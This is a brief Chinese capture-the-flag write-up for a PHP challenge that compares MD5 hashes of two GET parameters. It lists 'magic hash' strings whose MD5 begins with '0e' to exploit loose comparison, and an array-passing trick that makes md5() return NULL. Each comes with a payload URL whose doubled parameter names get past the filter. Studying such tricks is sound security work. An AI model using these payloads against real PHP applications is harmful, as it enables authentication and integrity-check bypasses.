**题目说明:将get的两个参数中的key替换为空,然后对key1,key2的值进行md5加密,
如果md5加密的值一样而未加密的值不同,就输出flag**
MD5绕过:
下列的字符串的MD5值都是0e开头的:
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a
pyload:
♾️ abap 代码:http://123123.men/?kekeyy1=QNKCDZO&kekeyy2=240610708
数组漏洞:
md5()函数无法处理数组,如果我们传数组进去,会返回一个NULL,所以两个数组经过加密后得到的都是相同的NULL。
pyload:
♾️ abap 代码:http://123123.men/?kekeyy1[]=1&kekeyy2[]=2